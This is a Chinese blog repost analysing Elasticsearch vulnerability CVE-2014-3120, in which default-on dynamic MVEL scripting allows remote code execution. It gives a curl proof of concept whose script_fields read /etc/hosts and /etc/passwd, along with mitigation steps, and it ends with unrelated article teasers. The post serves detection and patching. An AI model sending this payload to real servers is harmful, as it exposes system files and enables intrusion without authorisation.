ElasticSearch远程随意代码运行漏洞(CVE-2014-3120)分析

原理

这个漏洞实际上非常easy,ElasticSearch有脚本运行(scripting)的功能,能够非常方便地对查询出来的数据再加工处理。

ElasticSearch用的脚本引擎是MVEL,这个引擎没有做不论什么的防护,或者沙盒包装,所以直接能够运行随意代码。

而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户能够直接通过http请求,运行随意代码。

事实上官方是清楚这个漏洞的,在文档里有说明:

First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween. 


检測方法

在线检測:

http://tool.scanv.com/es.html          能够检測随意地址

http://bouk.co/blog/elasticsearch-rce/poc.html   仅仅检測localhost。只是会输出/etc/hosts和/etc/passwd文件的内容到网页上

自己手动检測:

curl -XPOST 'http://localhost:9200/_search?

pretty' -d ' { "size": 1, "query": { "filtered": { "query": { "match_all": {} } } }, "script_fields": { "/etc/hosts": { "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();" }, "/etc/passwd": { "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();" } } } '

处理办法

关掉运行脚本功能,在配置文件elasticsearch.yml里为每个结点都加上:

script.disable_dynamic: true

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts

官方会在1.2版本号默认关闭动态脚本。

https://github.com/elasticsearch/elasticsearch/issues/5853

參考:

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html

http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/search-request-script-fields.html

http://bouk.co/blog/elasticsearch-rce/

转载于:https://www.cnblogs.com/jzssuanfa/p/6803338.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/283694.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

《Effective Java》—— 对于所有对象都通用的方法

本节主要涉及Object中通用的一些方法,比如equals,hashCode,toString,clone,finalize等等 覆盖equals时请遵守通用约定 equals方法实现的等价关系: 自反性:对于所有的非null,aa对称性:ab,则ba传递性:ab,bc,则…

.net core实现读取自定义配置文件

背景在.net core类库中读取配置文件,正常来讲我们在应用程序目录下有个appsettings.json文件对于相关配置都会放在这个json文件中,但是要是建立一个类库项目,对于一些配置比如密钥或者其他需要硬编码的数据放在JSON文件中,在.net …

Java中ArrayList,LinkedList,Vector三者的异同点及其使用场景和ArrayList的一些常用方法

相同点:三者存储的都是有序,可重复的数据。 异: ①:ArrayList底层存储类型是Object数组,而LinkedList底层是双向链表 ②:ArrayList和Vector调用创建空参构造器创建对象时,默认的size是10&…

第二百四十六节,Bootstrap弹出框和警告框插件

Bootstrap弹出框和警告框插件 学习要点: 1.弹出框 2.警告框 本节课我们主要学习一下 Bootstrap 中的弹出框和警告框插件。 一.弹出框 弹出框即点击一个元素弹出一个包含标题和内容的容器。 基本用法 注意:必须在js结合popover()方法使用 da…

Intellij IDEA2017 的控制台里不识别maven命令问题处理

2019独角兽企业重金招聘Python工程师标准>>> cmd里运行 mvn -v可以显示出maven的版本信息,可是在IDEA的控制台里却提示不识别maven命令,此情况以管理员的身份运行IDEA即可。 转载于:https://my.oschina.net/u/2364025/blog/1788797

使用IDEA 提交代码到svn

2019独角兽企业重金招聘Python工程师标准>>> 新手第一次使用教程: 一、安装svn TortoiseSVN是个客户端,需要安装VisualSVN服务端。 二、IDEA配置(Ctrl alt S) 需要配置服务端svn.exe文件。 三、上传代码 svn路径&…

如何在 BackgroundService 获取 ASP.NET Core 启动地址

前言上次,我们介绍了《如何获取 ASP.NET Core 启动地址》。但是,如果要在 BackgroundService 中获取启动地址可不那么容易,因为 BackgroundService 在 app 启动前就开始执行了:var builder WebApplication.CreateBuilder(args); builder.Ser…

JDK8 循环遍历list

简介 Java 8 API添加了一个新的抽象称为流Stream,可以让你以一种声明的方式处理数据。Stream 使用一种类似用 SQL 语句从数据库查询数据的直观方式来提供一种对 Java 集合运算和表达的高阶抽象。 这种风格将要处理的元素集合看作一种流, 流在管道中传输&…

2016 校园招聘求职经历(二)

概述 航信是一家国企,给人的印象是比较踏实,不过也感觉缺乏活跃性。我是航信第一批校招去,同样它也是我面试的第一家公司。 宣讲会 9月27日,下午2:30开始宣讲会,大约持续了30分钟左右,整个感觉是…

016-Spring Boot JDBC

一、数据源装配 通过查看代码可知,默认已装配了数据源和JdbcTemplate System.out.println(context.getBean(DataSource.class)); System.out.println(context.getBean(JdbcTemplate.class)); 1.1、环境搭建 主要是pom引用:spring-boot-starter-jdbc、增加…

分库分表和 NewSQL 到底怎么选?

文章来源:【公众号:CoderW】 目录 背景 分表 分库 分库分表的成本 NewSQL NewSQL 平滑接入方案 NewSQL 真的有那么好吗? NewSQL 的应用 分库分表和 NewSQL 到底怎么选? 背景 曾几何时,“并发高就分库&#xff…

JsonPath基本使用

概述在.Net开发中,一般操作Json都是使用Newtonsoft.Json包,下面我们来使用该包以类似xpath的方式JsonPath操作Json。介绍JsonPath是xpath在json中的应用,是参照xpath表达式来解析xml文档的方式,用一个抽象的名字$来表示最外层的对…

jQuery/javascript实现简单网页计算器

1 <html>2 <head>3 <meta charset"utf-8">4 <title>jQuery实现</title>5 <script src"jquery.js"></script>6 7 <style type"text/css">8 table{background-color:pink;width:300px;height…

AC日记——Paint Pearls hdu 5009

Paint Pearls 思路&#xff1a; 离散化dp剪枝&#xff1b; dp是个n方的做法&#xff1b; 重要就在剪枝&#xff1b; 如果一个长度为n的区间&#xff0c;有大于根号n种颜色&#xff0c;还不如一个一个涂&#xff1b; 来&#xff0c;上代码&#xff1a; #include <cstdio> …

CSS缩写总结

1、16进制的色彩值&#xff0c;如果每两位的值相同&#xff0c;可以缩写一半。如&#xff1a; color: #ffffff > color: #fffcolor: #aabbcc > color: #abc2、边框语法糖 边框&#xff1a; border: width style color; > border: (边宽) (样式) (颜色); 如&#xff1a…

雷军招人反被3句话问懵:当我在面试牛人的时候,牛人也在面试我

来 源&#xff5c;环球人力资源智库&#xff08;GHRlib&#xff09; 作 者&#xff5c;Black “你做过手机吗&#xff1f;” “没做过。” “你认识中移动老总王建宙吗&#xff1f;” “不认识。” “你认识富士康老板郭台铭吗&#xff1f;” “我认识他&#xff0c;他不认识我…

【jQuery系列之插件】jQuery插件---exselect实现联动

<!DOCTYPE HTML> <html> <head><meta charset"utf-8"><title>cxSelect 联动下拉菜单 </title><style>body{background:#ddd;font:14px/1.7 tahoma,\5fae\8f6f\96c5\9ed1,sans-serif;}fieldset{margin:2em 0;}fieldset leg…

C# 11 中的 required members

C# 11 中的 required membersIntro在 C# 11 中引入了一个新的特性 —— Required Members&#xff0c;引入了一个新的 required 关键词&#xff0c;可以用来表示字段或者属性在类型初始化的时候必须要进行初始化&#xff0c;这一特性也进一步的改进了可空引用类型的用法。Sampl…

架构师速成4.6-软技能和硬技能

架构师速成4.6-软技能和硬技能 在投职和面试的过程中。雇主一般会查看求职者的两种技能&#xff1a;硬技能与软技能。 硬技能就是可以通过培训或可以easy量化的技能。硬技能包含以下这些&#xff1a; 熟练的外语能力文凭或证书打字速度计算机程序编写能力而软技能。则是较难量化…

Netty1:初识Netty

为什么使用Netty Netty是业界最流行的NIO框架之一&#xff0c;它的健壮性、功能、性能、可定制性、可扩展性在同类框架中都是首屈一指的&#xff0c;它已经得到了成百上千的商用项目的证明。对于为什么使用Netty这个话题&#xff0c;我们先看一下使用原生的NIO有什么缺点&#…